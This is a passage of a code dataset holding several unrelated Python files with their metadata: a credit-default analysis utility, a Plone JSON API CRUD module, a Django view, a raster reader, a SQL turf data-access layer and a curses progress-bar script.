_calculateAge(columnToConvert.loc[i])\n except:\n print('IN COL: ',col, ' VALUE: ', columnToConvert.at[i], ' IS NOT A DATE')\n return\n data[col] = data.loc[:,col].astype(float)\n\ndef _getDate(dateStr):\n if _isNan(dateStr):\n return numpy.nan\n day = ''\n month = ''\n year = ''\n flag = 'readDay'\n for iChar in dateStr:\n if iChar == ' ':\n break\n elif iChar == '/':\n if flag == 'readDay':\n flag = 'readMonth'\n elif flag == 'readMonth':\n flag = 'readYear'\n elif flag == 'readDay':\n day += iChar\n elif flag == 'readMonth':\n month += iChar\n elif flag == 'readYear':\n year += iChar\n return [int(day),int(month),int(year)]\n\ndef _calculateAge(strDate):\n strFormat = _getDate(strDate)\n try:\n day = strFormat[0]\n month = strFormat[1]\n year = strFormat[2]\n return (datetime.datetime.now() - datetime.datetime(year,month,day)).days\n except:\n return numpy.nan \n\ndef predictionsSum(pred, pagoTest, atrasoTest):\n sumPago = 0.0\n sumAtraso = 0.0\n for i in range(len(pred)):\n if pred[i] == '0':\n sumPago += float(pagoTest[i])\n sumAtraso += float(atrasoTest[i])\n return [sumPago, sumAtraso]\n\ndef inadimplenciaEmReais(prediction):\n testCols = dp.getTestSavedColumns()\n [pago, atraso] = predictionsSum(pred, testCols['VlrPago'], testCols['VlrEmAtraso'])\n accuracy = (pred == dp.getYtest())\n countPred = collections.Counter(prediction)\n aceites = countPred['0']\n print('aceites: ', aceites)\n print('acuracia: ',round((accuracy.mean())*100),'%')\n print('Inadimplencia: ', round(100*atraso/pago),'%')\n print('prejuizo absoluto: ', round(atraso/1e6,2), ' milhoes')\n print('prejuizo por numeros de aceites: ', atraso/aceites, ' reais')\n \ndef printFeaturesImportances(dp, model):\n xtestCols = list(dp.getXtest().columns)\n colsImport = model.feature_importances_\n for xCols,colsImp in zip(xtestCols,colsImport):\n print(xCols, ' ',round(100*colsImp,1),'%') \n\ndef calculateComprometimentoDeRenda(data):\n comprometimento = []\n for i in data.index:\n pclAbe = float(data.loc[i,'Valor Parcelas em aberto Banco Semear Consulta Proposta JRetail PF '])\n pclCompra = float(data.loc[i,'Valor Parcela da compra Banco Semear Consulta Proposta JRetail PF '])\n renda = float(data.loc[i,'Valor Renda Banco Semear Consulta Proposta JRetail PF '])\n compRenda = (pclAbe + pclCompra) / renda\n comprometimento.append(compRenda)\n data['comprometimento'] = comprometimento\n data = data.drop(['Valor Parcelas em aberto Banco Semear Consulta Proposta JRetail PF '],axis=1)\n data = data.drop(['Valor Parcela da compra Banco Semear Consulta Proposta JRetail PF '],axis=1)\n data = data.drop(['Valor Renda Banco Semear Consulta Proposta JRetail PF '],axis=1)\n return data\n \n\ndef breakColIntoAdimAndFraud(colName, data, targetCol = 'Inadimplente'):\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n x = data.loc[:,[colName,targetCol]].copy()\n nanIndexes = pandas.isnull(x).any(1).nonzero()[0]\n x = x.drop(nanIndexes)\n x = x.drop([targetCol],axis=1)\n y = data.loc[:,targetCol].copy()\n y = y.drop(nanIndexes)\n adimI = y[y=='0'].index\n inadI = y[y=='1'].index\n notFraudInd = data[data.loc[:,'VlrPago'] != 0].index \n y = y.drop(notFraudInd)\n inadFraudI = y[y=='1'].index\n xinad = x.loc[inadI].copy()\n xadim = x.loc[adimI].copy()\n inadFraud = x.loc[inadFraudI].copy()\n return [xadim, xinad,inadFraud]\n\ndef breakColIntoAdimAndInad(colName, data, targetCol = 'Inadimplente'):\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n x = data.loc[:,[colName,targetCol]].copy()\n nanIndexes = pandas.isnull(x).any(1).nonzero()[0]\n x = x.drop(nanIndexes)\n x = x.drop([targetCol],axis=1)\n y = data.loc[:,targetCol].copy()\n y = y.drop(nanIndexes)\n adimI = y[y=='0'].index\n inadI = y[y=='1'].index\n xinad = x.loc[inadI].copy()\n xadim = x.loc[adimI].copy()\n return [xadim, xinad]\n\n\ndef histogramPlotFraud(xadim, xinad, xFraud, ylim = 2000):\n colors = dict(mcolors.BASE_COLORS, **mcolors.CSS4_COLORS)\n colName = list(xadim.columns)[0] \n fig = plt.figure()\n plt.hist(numpy.array(xadim),color=colors['b'])\n plt.hist(numpy.array(xinad),color=colors['g'])\n plt.hist(numpy.array(xFraud),color=colors['r'])\n plt.ylabel('Count')\n plt.xlabel(colName)\n plt.ylim(0,ylim)\n fig.savefig('histogram--' + colName + '.png', dpi=150)\n \ndef removeOutliers(col, cutValue, flag='greater'):\n if flag == 'greater':\n indexCut = col[col.values > cutValue].index\n return col.drop(indexCut)\n elif flag == 'lower':\n indexCut = col[col.values < cutValue].index\n return col.drop(indexCut)\n \ndef removeOutliersWithLimits(xVector, outliersLimits):\n if len(outliersLimits) == 0:\n return xVector\n if outliersLimits[0] != None:\n xVector = removeOutliers(xVector, outliersLimits[0], 'lower')\n if outliersLimits[1] != None:\n xVector = removeOutliers(xVector, outliersLimits[1])\n return xVector\n\ndef printModelPredictionsSmartCredit(yReal, prediction):\n confusionMatrix = confusion_matrix(yReal,prediction)\n print('Inadimplencia final: ', round(100*confusionMatrix[1][0] /(confusionMatrix[1][0] + confusionMatrix[0][0])),'%')\n print('Dos inadimplentes, acertei: ',round(100*confusionMatrix[1][1] /(confusionMatrix[1][0] + confusionMatrix[1][1])),'%')\n print('Dos adimplentes, acertei: ',round(100*confusionMatrix[0][0] /(confusionMatrix[0][0] + confusionMatrix[0][1])),'%')\n print('KAPPA: ',cohen_kappa_score(yReal,prediction))\n confusionPlot(yReal, prediction)\n\ndef confusionPlot(Ytest, predictions):\n confusionMatrix = confusion_matrix(Ytest, predictions)\n print(confusionMatrix)\n seaPlot = sns.heatmap(confusionMatrix, square=True, annot=True, cbar=False)\n plt.xlabel('predicted value')\n plt.ylabel('true value')\n plt.show()\n\ndef generateScoreTable(model, dataX, dataY):\n dataX.index = range(len(dataX))\n dataPred = model.predict_proba(dataX)\n dataPred = pandas.DataFrame(data = dataPred)\n dataPred.columns = model.classes_\n dataPred['score'] = dataPred.loc[:,'0'] * 1000\n dataPred['Inadimplente'] = list(dataY)\n return dataPred\n \n ","sub_path":"core/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":9342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"222117371","text":"# -*- coding: utf-8 -*-\n\nimport logging\n\nfrom plone import api as ploneapi\nfrom plone.jsonapi.core import router\n\nfrom Products.CMFCore.interfaces import ISiteRoot\nfrom Products.ZCatalog.interfaces import ICatalogBrain\nfrom Products.ATContentTypes.interfaces import IATContentType\nfrom plone.dexterity.interfaces import IDexterityContent\nfrom plone.dexterity.utils import getAdditionalSchemata\n\n# request helpers\nfrom plone.jsonapi.routes.request import get_sort_limit\nfrom plone.jsonapi.routes.request import get_sort_on\nfrom plone.jsonapi.routes.request import get_sort_order\nfrom plone.jsonapi.routes.request import get_query\nfrom plone.jsonapi.routes.request import get_creator\nfrom plone.jsonapi.routes.request import get_request_data\n\nfrom plone.jsonapi.routes.interfaces import IInfo\n\nfrom plone.jsonapi.routes import underscore as _\nfrom plone.app.dexterity.behaviors.metadata import ICategorization\nfrom plone.namedfile.interfaces import INamedBlobFileField,INamedBlobImageField\nfrom plone.namedfile import NamedBlobFile, NamedBlobImage\nfrom plone.app.dexterity.behaviors.metadata import IPublication\nfrom base64 import b64decode\nfrom AccessControl import getSecurityManager\nfrom AccessControl import Unauthorized\nfrom Products.CMFCore import permissions\n\nfrom plone.app.contenttypes.behaviors.leadimage import ILeadImage\n\n\nlogger = logging.getLogger(\"plone.jsonapi.routes\")\n\n\n#-----------------------------------------------------------------------------\n# Json API (CRUD) Functions\n#-----------------------------------------------------------------------------\n\n# GET\ndef get_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" returns a list of items\n\n 1. If the UID is given, fetch the object directly => should return 1 item\n 2. If no UID is given, search for all items of the given portal_type\n \"\"\"\n # contains the full query with params\n query = make_query(request, portal_type=portal_type)\n if uid is not None: query[\"UID\"] = uid\n\n results = search(request, **query)\n\n # if the uid is given, get the complete information set\n complete = uid and True or False\n return make_items_for(results, endpoint, complete=complete)\n\n\n### CREATE\ndef create_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" create items\n\n 1. If the uid is given, get the object and create the content in there\n (assumed that it is folderish)\n 2. If no uid is given, the target folder is the portal.\n \"\"\"\n\n # destination where to create the content\n dest = uid and get_object_by_uid(uid) or None\n\n # extract the data from the request\n records = get_request_data(request)\n\n results = []\n for record in records:\n if dest is None:\n # find the container for content creation\n dest = find_target_container(record, portal_type)\n obj = create_object_in_container(dest, portal_type, record)\n results.append(obj)\n\n return make_items_for(results, endpoint=endpoint)\n\n### UPDATE\ndef update_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" update items\n\n 1. If the uid is given, the user wants to update the object with the data\n given in request body\n 2. If no uid is given, the user wants to update a bunch of objects.\n \"\"\"\n\n # the data to update\n records = get_request_data(request)\n\n objects = []\n if uid:\n objects.append(get_object_by_uid(uid))\n else:\n # get the objects for the given uids\n objects = (map(get_object_by_uid, _.pluck(records, \"uid\")))\n\n results = []\n for obj in objects:\n # get the update dataset for this object\n gsm = getSecurityManager()\n if not gsm.checkPermission(permissions.ModifyPortalContent, obj):\n raise Unauthorized(\"You may not modify this object\")\n\n if uid:\n record = records and records[0] or {}\n else:\n # the uid is inside the payload\n record = filter(lambda d: get_uid(obj) == d.get(\"uid\"), records)\n record = record and record[0] or {}\n\n # do a wf transition\n if record.get(\"transition\", None):\n t = record.get(\"transition\")\n logger.info(\">>> Do Transition '%s' for Enquiry %s\", t, obj.getId())\n do_action_for(obj, t)\n\n obj = update_object_with_data(obj, record)\n results.append(obj)\n return make_items_for(results, endpoint=endpoint)\n\n### DELETE\ndef delete_items(portal_type, request, uid=None, endpoint=None):\n \"\"\" delete items\n\n 1. If the uid is given, we can ignore the request body and delete the\n object with the given uid (if the uid was valid).\n 2. If no uid is given, the user wants to delete more than one item.\n => go through each item and extract the uid. Delete it afterwards.\n // we should do this kind of transaction base. So if we can not get an\n // object for an uid, no item will be deleted.\n 3. we could check if the portal_type matches, just to be sure the user\n wants to delete the right content.\n \"\"\"\n\n objects = []\n if uid:\n objects.append(get_object_by_uid(uid))\n else:\n payload = get_request_data(request)\n objects = (map(get_object_by_uid, _.pluck(payload, \"uid\")))\n\n results = []\n for obj in objects:\n result = {\"id\": obj.getId()}\n result[\"deleted\"] = ploneapi.content.delete(obj) == None and True or False\n results.append(result)\n\n return results\n\n#-----------------------------------------------------------------------------\n# Data Functions\n#-----------------------------------------------------------------------------\n\ndef make_items_for(brains_or_objects, endpoint, complete=True):\n \"\"\" return a list of info dicts\n \"\"\"\n def _block(brain):\n info = dict(api_url=url_for(endpoint, uid=get_uid(brain)))\n # update with std. catalog metadata\n info.update(IInfo(brain)())\n\n # switch to wake up the object and complete the informations with the\n # data of the content adapter\n if complete:\n obj = get_object(brain)\n info.update(IInfo(obj)())\n info.update(get_parent_info(obj))\n return info\n\n return map(_block, brains_or_objects)\n\n\ndef get_parent_info(obj):\n \"\"\" returns the infos for the parent object\n \"\"\"\n\n parent = get_parent(obj)\n endpoint = get_endpoint(parent.portal_type)\n\n if ISiteRoot.providedBy(parent):\n return {\n \"parent_id\": parent.getId(),\n \"parent_uid\": 0\n }\n\n return {\n \"parent_id\": parent.getId(),\n \"parent_uid\": get_uid(parent),\n \"parent_url\": url_for(endpoint, uid=get_uid(parent))\n }\n\ndef get_subcontents(parent, ptype):\n \"\"\" returns the contained contents\n \"\"\"\n\n # get the contained objects\n children = parent.listFolderContents(\n contentFilter={\"portal_type\": [ptype]})\n\n # get the endpoint for the searched results\n endpoint = get_endpoint(ptype)\n\n items = []\n for child in children:\n info = dict(api_url=url_for(endpoint, uid=get_uid(child)))\n info.update(IInfo(child)())\n info.update(get_parent_info(child))\n items.append(info)\n\n return {\n \"url\": url_for(endpoint),\n \"count\": len(items),\n \"items\": items\n }\n\n#-----------------------------------------------------------------------------\n# Portal Catalog Helper\n#-----------------------------------------------------------------------------\n\ndef search(*args, **kw):\n \"\"\" search the portal catalog \"\"\"\n pc = get_portal_catalog()\n return pc(*args, **kw)\n\ndef make_query(request, **kw):\n \"\"\" generates a content type query suitable for the portal catalog\n \"\"\"\n\n # build the catalog query\n query = {\n \"sort_limit\": get_sort_limit(request),\n \"sort_on\": get_sort_on(request),\n \"sort_order\": get_sort_order(request),\n \"SearchableText\": get_query(request),\n }\n\n # inject keyword args\n query.update(kw)\n\n # inject the creator if given\n if get_creator(request):\n query[\"Creator\"] = get_creator(request)\n\n logger.info(\"Catalog Query --> %r\", query)\n return query\n\n#-----------------------------------------------------------------------------\n# Functional Helpers\n#-----------------------------------------------------------------------------\n\ndef get_portal():\n \"\"\" return the Plone site \"\"\"\n return ploneapi.portal.getSite()\n\ndef get_tool(name):\n \"\"\" return a Plone tool by name \"\"\"\n return ploneapi.portal.get_tool(name)\n\ndef get_portal_catalog():\n \"\"\" return portal_catalog tool \"\"\"\n return get_tool(\"portal_catalog\")\n\ndef get_portal_reference_catalog():\n \"\"\" return reference_catalog tool \"\"\"\n return get_tool(\"reference_catalog\")\n\ndef get_portal_types_tool():\n \"\"\" return the portal types tool \"\"\"\n return get_tool(\"portal_types\")\n\ndef get_portal_workflow():\n \"\"\" return portal_workflow tool \"\"\"\n return get_tool(\"portal_workflow\")\n\ndef url_for(endpoint, **values):\n \"\"\" returns the api url\n \"\"\"\n return router.url_for(endpoint, force_external=True, values=values)\n\ndef get_uid(obj):\n \"\"\" get the UID of the brain/object\n \"\"\"\n if ICatalogBrain.providedBy(obj):\n return obj.UID\n if ISiteRoot.providedBy(obj):\n return \"siteroot\"\n return obj.UID()\n\ndef get_schema(obj):\n \"\"\" return the schema of this type \"\"\"\n if IATContentType.providedBy(obj):\n return obj.schema\n pt = get_portal_types_tool()\n fti = pt.getTypeInfo(obj.portal_type)\n return fti.lookupSchema()\n\ndef get_behaviors_schema(obj):\n return list(getAdditionalSchemata(obj))\n\ndef get_object(brain_or_object):\n \"\"\" return the referenced object \"\"\"\n if not ICatalogBrain.providedBy(brain_or_object):\n return brain_or_object\n return brain_or_object.getObject()\n\ndef get_parent(brain_or_object):\n \"\"\" return the referenced object \"\"\"\n obj = get_object(brain_or_object)\n return obj.aq_parent\n\ndef get_endpoint(portal_type):\n \"\"\" get the endpoint for this type \"\"\"\n # handle portal types with dots\n portal_type = portal_type.split(\".\").pop()\n # remove whitespaces\n portal_type = portal_type.replace(\" \", \"\")\n # lower and pluralize\n portal_type = portal_type.lower() + \"s\"\n\n return portal_type\n\ndef get_object_by_uid(uid):\n \"\"\" return the object by uid\n \"\"\"\n if not uid:\n raise RuntimeError(\"No UID given\")\n\n obj = None\n pc = get_portal_catalog()\n rc = get_portal_reference_catalog()\n res = pc.search(dict(UID=uid))\n\n if len(res) > 1:\n raise ValueError(\"More than one object found for UID %s\" % uid)\n elif len(res) == 0:\n # try with the ref catalog\n obj = rc.lookupObject(uid)\n else:\n obj = res[0].getObject()\n\n if obj is None:\n raise KeyError(\"No Objects found for UID %s\" % uid)\n\n return obj\n\ndef find_target_container(record, portal_type):\n \"\"\" find the target container for this record\n\n \"\"\"\n parent_uid = record.get(\"parent_uid\")\n\n if parent_uid:\n # if we have an parent_uid, we use it\n return get_object_by_uid(parent_uid)\n\n if parent_uid == 0:\n return get_portal()\n\n raise RuntimeError(\"Could not find a suitable place to create the content\")\n\ndef do_action_for(obj, transition):\n \"\"\" perform wf transition \"\"\"\n return ploneapi.content.transition(obj, transition)\n\ndef get_current_user():\n \"\"\" return the current logged in user \"\"\"\n return ploneapi.user.get_current()\n\ndef create_object_in_container(container, portal_type, record):\n \"\"\" creates an object with the given data in the container\n \"\"\"\n from AccessControl import Unauthorized\n try:\n title = record.get(\"title\")\n obj = ploneapi.content.create(\n container=container, type=portal_type, title=title, save_id=True)\n return update_object_with_data(obj, record)\n except Unauthorized:\n raise RuntimeError(\"You are not allowed to create this content\")\n\ndef update_object_with_data(content, record):\n \"\"\" update the content with the values from records\n \"\"\"\n schema = get_schema(content)\n is_atct = IATContentType.providedBy(content)\n is_dext = IDexterityContent.providedBy(content)\n\n for k, v in record.items():\n\n if is_atct:\n field = schema.get(k)\n\n if is_dext:\n schemas = list()\n schemas.append(schema)\n schemas.extend(get_behaviors_schema(content))\n for i in schemas:\n field = i.get(k)\n if field:\n break\n\n logger.info(\"update_object_with_data::processing key=%r, value=%r, field=%r\", k, v, field)\n if field is None:\n logger.info(\"update_object_with_data::skipping key=%r\", k)\n continue\n\n if is_atct:\n # XXX handle security\n mutator = field.getMutator(content)\n mutator(v)\n else:\n #ugly hack for tags\n if ICategorization is field.interface:\n content.setSubject(v)\n\n elif IPublication is field.interface:\n if k == u'effective':\n content.setEffectiveDate(v)\n elif k == u'expires':\n content.setExpirationDate(v)\n\n elif INamedBlobImageField.providedBy(field):\n filename = v.get(\"filename\")\n data = b64decode(v.get(\"data\"))\n file_obj = NamedBlobImage(data,filename=filename)\n field.validate(file_obj)\n field.set(content, file_obj)\n\n elif INamedBlobFileField.providedBy(field):\n filename = v.get(\"filename\")\n data = b64decode(v.get(\"data\"))\n file_obj = NamedBlobFile(data, filename=filename)\n field.validate(file_obj)\n field.set(content, file_obj)\n\n else:\n field.validate(v)\n field.set(content, v)\n\n content.reindexObject()\n return content\n\n# vim: set ft=python ts=4 sw=4 expandtab :\n\n","sub_path":"src/plone/jsonapi/routes/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":14122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"549251505","text":"from django.shortcuts import render\nfrom . import models\n\ndef index(request):\n num_books= models.Book.objects.all().count()\n num_instances= models.BookInstance.objects.all().count()\n num_instances_available= models.BookInstance.objects.filter(status__exact='a').count()\n num_authors= models.Author.objects.all().count()\n return render(\n request,\n 'app1/index.html',\n context= {'num_books': num_books, 'num_instances': num_instances,'num_instances_available': num_instances_available, 'num_authors': num_authors}\n )\n","sub_path":"locallibrary/app1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"323199902","text":"# -------------------------------------------------------------------------------------\n# Library\nimport logging\nimport numpy as np\nimport rasterio\nimport rasterio.crs\nimport os\nimport matplotlib.pylab as plt\n\nfrom lib_hs_io_generic import create_darray_2d\n\nlogging.getLogger('rasterio').setLevel(logging.WARNING)\n# -------------------------------------------------------------------------------------\n\n\n# --------------------------------------------------------------------------------\n# Method to convert decimal degrees to km (2)\ndef deg_2_km(deg):\n # Earth radius\n earth_radius = 6378.1370\n km = deg * (np.pi * earth_radius) / 180\n return km\n# --------------------------------------------------------------------------------\n\n\n# --------------------------------------------------------------------------------\n# Method to convert km to decimal degrees\ndef km_2_deg(km):\n # Earth radius\n earth_radius = 6378.1370\n deg = 180 * km / (np.pi * earth_radius)\n return deg\n# --------------------------------------------------------------------------------\n\n\n# --------------------------------------------------------------------------------\n# Method to find XY geographical indexes\ndef find_geo_index(geo_x_ref, geo_y_ref, geo_x_var, geo_y_var, geo_cellsize_var):\n\n # Get geographical information\n yu_ref = np.max(geo_y_ref)\n xl_ref = np.min(geo_x_ref)\n # Compute index\n index_y_var = np.ceil((yu_ref - geo_y_var.ravel()) / geo_cellsize_var)\n index_x_var = np.ceil((geo_x_var.ravel() - xl_ref) / geo_cellsize_var)\n # From double to integer\n index_x_var = np.int32(index_x_var)\n index_y_var = np.int32(index_y_var)\n\n return index_x_var, index_y_var\n# --------------------------------------------------------------------------------\n\n\n# -------------------------------------------------------------------------------------\n# Method to get a raster ascii file\ndef read_file_raster(file_name, file_proj='epsg:4326', var_name='land',\n coord_name_x='west_east', coord_name_y='south_north',\n dim_name_x='west_east', dim_name_y='south_north', no_data_default=-9999.0):\n\n if os.path.exists(file_name):\n if (file_name.endswith('.txt') or file_name.endswith('.asc')) or file_name.endswith('.tif'):\n\n crs = rasterio.crs.CRS({\"init\": file_proj})\n with rasterio.open(file_name, mode='r+') as dset:\n dset.crs = crs\n bounds = dset.bounds\n no_data = dset.nodata\n res = dset.res\n transform = dset.transform\n data = dset.read()\n proj = dset.crs.wkt\n values = data[0, :, :]\n\n if (no_data is None) or (np.isnan(no_data)):\n no_data = no_data_default\n\n decimal_round = 7\n\n center_right = bounds.right - (res[0] / 2)\n center_left = bounds.left + (res[0] / 2)\n center_top = bounds.top - (res[1] / 2)\n center_bottom = bounds.bottom + (res[1] / 2)\n\n lon = np.arange(center_left, center_right + np.abs(res[0] / 2), np.abs(res[0]), float)\n lat = np.flip(np.arange(center_bottom, center_top + np.abs(res[0] / 2), np.abs(res[1]), float), axis=0)\n lons, lats = np.meshgrid(lon, lat)\n\n if center_bottom > center_top:\n center_bottom_tmp = center_top\n center_top_tmp = center_bottom\n center_bottom = center_bottom_tmp\n center_top = center_top_tmp\n values = np.flipud(values)\n lats = np.flipud(lats)\n\n # # Debug\n # plt.figure()\n # plt.imshow(lats)\n # plt.colorbar()\n #\n # # Debug\n # plt.figure()\n # plt.imshow(values)\n # plt.colorbar()\n # plt.show()\n\n min_lon_round = round(np.min(lons), decimal_round)\n max_lon_round = round(np.max(lons), decimal_round)\n min_lat_round = round(np.min(lats), decimal_round)\n max_lat_round = round(np.max(lats), decimal_round)\n\n center_right_round = round(center_right, decimal_round)\n center_left_round = round(center_left, decimal_round)\n center_bottom_round = round(center_bottom, decimal_round)\n center_top_round = round(center_top, decimal_round)\n\n assert min_lon_round == center_left_round\n assert max_lon_round == center_right_round\n assert min_lat_round == center_bottom_round\n assert max_lat_round == center_top_round\n\n dims = values.shape\n high = dims[0] # nrows\n wide = dims[1] # cols\n\n bounding_box = [min_lon_round, max_lat_round, max_lon_round, min_lat_round]\n\n da = create_darray_2d(values, lons, lats, coord_name_x=coord_name_x, coord_name_y=coord_name_y,\n dim_name_x=dim_name_x, dim_name_y=dim_name_y, name=var_name)\n\n else:\n logging.error(' ===> Geographical file ' + file_name + ' format unknown')\n raise NotImplementedError('File type reader not implemented yet')\n else:\n logging.error(' ===> Geographical file ' + file_name + ' not found')\n raise IOError('Geographical file location or name is wrong')\n\n return da, wide, high, proj, transform, bounding_box, no_data\n# -------------------------------------------------------------------------------------\n","sub_path":"apps/ground_network/hs/lib_hs_geo.py","file_name":"lib_hs_geo.py","file_ext":"py","file_size_in_byte":5507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"562701179","text":"from dao.dao import get_dao\n\n\n@get_dao\ndef get_neighborhoods(dao):\n sql = \"SELECT * FROM neighborhoods;\"\n return dao.execute(sql)\n\n\n@get_dao\ndef get_turf_types(dao):\n sql = \"SELECT * FROM neighborhood_type;\"\n return dao.execute(sql)\n\n\n@get_dao\ndef get_my_county(dao):\n sql = \"SELECT DISTINCT county_code, county_name FROM precincts\"\n return dao.execute(sql)\n\n\n@get_dao\ndef get_jurisdictions(dao):\n sql = (\"SELECT DISTINCT jurisdiction_code, jurisdiction_name \"\n \"FROM precincts;\")\n return dao.execute(sql)\n\n\n@get_dao\ndef get_wards(dao, jurisdiction_code):\n sql = (\"SELECT DISTINCT(ward) FROM precincts \"\n \"WHERE jurisdiction_code=?;\")\n vals = (jurisdiction_code,)\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_precincts(dao, jurisdiction_code=None, ward_no=None):\n sql = \"SELECT * FROM precincts \"\n vals = None\n if jurisdiction_code:\n sql += \" WHERE jurisdiction_code=?\"\n vals = (jurisdiction_code,)\n if ward_no:\n sql += \" AND ward=?\"\n vals = (jurisdiction_code, ward_no)\n sql += 'ORDER BY jurisdiction_name, ward, precinct;'\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_turf(dao, addr):\n sql = (\"SELECT * FROM streets \"\n \"WHERE street_name_meta LIKE ? \"\n \"AND street_name LIKE ? \"\n \"AND ? BETWEEN block_low AND block_high \"\n \"AND odd_even IN (?, ?) \")\n vals = [\n addr.metaphone + '%',\n addr.street_name[0] + '%',\n addr.house_number,\n \"B\", addr.odd_even\n ]\n\n if addr.pre_direction:\n sql += \"AND pre_direction=? \"\n vals.append(addr.pre_direction)\n if addr.suf_direction:\n sql += \"AND suf_direction=? \"\n vals.append(addr.suf_direction)\n\n if addr.zipcode:\n sql += \"AND zipcode LIKE ? \"\n vals.append(addr.zipcode[0:-1] + '%')\n elif addr.city:\n sql += \"AND city=? \"\n vals.append(addr.city)\n\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_streets(dao, jurisdiction_code, ward, precinct):\n sql = (\"SELECT street_name, street_type \"\n \"FROM streets \"\n \"WHERE jurisdiction_code=? \"\n \"AND ward=? \"\n \"AND precinct=? \"\n \"GROUP BY street_name, street_type;\")\n vals = [jurisdiction_code, ward, precinct]\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef get_house_nums(dao, county_code, jurisdiction, street_name, street_type):\n sql = (\"SELECT * \"\n \"FROM streets \"\n \"WHERE county_code=? \"\n \"AND jurisdiction_code=? \"\n \"AND street_name=? \"\n \"AND street_type=? \"\n \"GROUP BY house_num_low, house_num_high;\")\n vals = [\n county_code, jurisdiction, street_name, street_type\n ]\n return dao.execute(sql, vals)\n\n\n@get_dao\ndef add_neighborhood(dao, ntype, name, pct_ids, blocks):\n sql = (\"INSERT INTO neighborhoods \"\n \"(name, type) VALUES (?,?);\")\n vals = (name, ntype)\n nbh_id = dao.execute(sql, vals)\n\n if pct_ids:\n add_nbh_precincts(dao, nbh_id, pct_ids)\n\n if blocks:\n add_blocks(dao, nbh_id, blocks)\n\n return nbh_id\n\n\n@get_dao\ndef neighborhood_name(dao, id, name):\n sql = \"UPDATE neighborhoods SET name=? WHERE id=?\"\n result = dao.execute(sql, (name, id))\n if result != 1:\n raise Exception('Unexpected update error!')\n\n\n@get_dao\ndef neighborhood_drop(dao, id):\n sqls = [\n \"DELETE FROM blocks WHERE neighborhood_id=%s\" % (id,),\n \"DELETE FROM neighborhood_precincts WHERE neighborhood_id=%s\" % (id,),\n \"DELETE FROM neighborhoods WHERE id=%s\" % (id,)\n ]\n dao.transaction(sqls)\n\n\n@get_dao\ndef add_nbh_precincts(dao, nbh_id, pct_ids):\n flds = ['neighborhood_id', 'precinct_id']\n vals = [(nbh_id, pct_id) for pct_id in pct_ids]\n dao.add_many('neighborhood_precincts', flds, vals)\n\n\n@get_dao\ndef add_blocks(dao, nbh_id, vals):\n flds = [\n 'street_name',\n 'street_type',\n 'low_addr',\n 'high_addr',\n 'odd_even',\n 'precinct_id',\n 'neighborhood_id'\n ]\n vals = [val + (nbh_id,) for val in vals]\n dao.add_many('blocks', flds, vals)\n\n\n@get_dao\ndef get_blocks(dao, nbh_id):\n sql = (\"SELECT precinct_id, street_name, street_type, low_addr, high_addr, odd_even \"\n \" FROM blocks WHERE neighborhood_id=?\")\n return dao.execute(sql, (nbh_id,))\n\n\n@get_dao\ndef get_neighborhood_precincts(dao, nbh_id):\n sql = (\"SELECT precinct_id FROM neighborhood_precincts \"\n \"WHERE neighborhood_id=?\")\n return dao.execute(sql, (nbh_id,))\n","sub_path":"dao/turf_dao.py","file_name":"turf_dao.py","file_ext":"py","file_size_in_byte":4563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"571107923","text":"#!/usr/bin/env python3\n\n# Reads a named pipe file and displays progress bars using curses.\n#\n# See multi_curl_progress_advanced.php\n#\n# $ ipython multi_curl_progress_advanced_watch_curses.py\n# 56% [=====================> ]\n# 23% [========> ]\n# 15% [=====> ]\n\nimport curses\nimport json\nimport os\n\n\nFIFO = \"/tmp/myfifo\"\n\n\ndef main(stdscr):\n # Create named pipe file if it doesn't exist.\n if not os.path.exists(FIFO):\n os.mkfifo(FIFO)\n\n curses.noecho()\n curses.cbreak()\n\n try:\n while True:\n display_progress_bars(stdscr)\n except KeyboardInterrupt:\n # Handle Control-C pressed.\n pass\n finally:\n curses.echo()\n curses.nocbreak()\n curses.endwin()\n\n # Return exit code 0.\n return 0\n\n\ndef display_progress_bars(stdscr):\n display_notice = True\n\n while True:\n if display_notice:\n display_notice = False\n stdscr.clear()\n stdscr.addstr(0, 0, \"waiting for input\")\n stdscr.refresh()\n\n # Read named pipe file.\n with open(FIFO) as f:\n for line in f:\n response = json.loads(line)\n\n # Update progress for each of the files being downloaded.\n for entry in response.get(\"downloads\", []):\n # Display a progress bar: xxx% [=======> ]\n progress_size = 40\n try:\n fraction_downloaded = entry[\"downloaded\"] / entry[\"size\"]\n except ZeroDivisionError:\n fraction_downloaded = 0\n dots = round(fraction_downloaded * progress_size)\n task_progress = \"%3.0f%% [\" % (fraction_downloaded * 100)\n\n i = 0\n while i < dots - 1:\n task_progress += \"=\"\n i += 1\n\n task_progress += \">\"\n\n while i < progress_size - 1:\n task_progress += \" \"\n i += 1\n\n task_progress += \"]\"\n\n stdscr.addstr(entry[\"position\"], 0, task_progress)\n\n # Refresh display of the progress bars.\n stdscr.refresh()\n\n # Exit only after progress bars have been updated to end with\n # each displaying 100%.\n if response.get(\"status\", \"\") == \"done\":\n return\n\n\nif __name__ == \"__main__\":\n # Avoid getting the terminal in an unmanagable state by using the curses\n # wrapper. The wrapper restores the terminal to its previous state even when\n # there is an uncaught exception.\n curses.wrapper(main)\n","sub_path":"examples/multi_curl_progress_advanced_watch_curses.py","file_name":"multi_curl_progress_advanced_watch_curses.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"345954728","text":"import sys\nimport logging\nimport functools\nimport 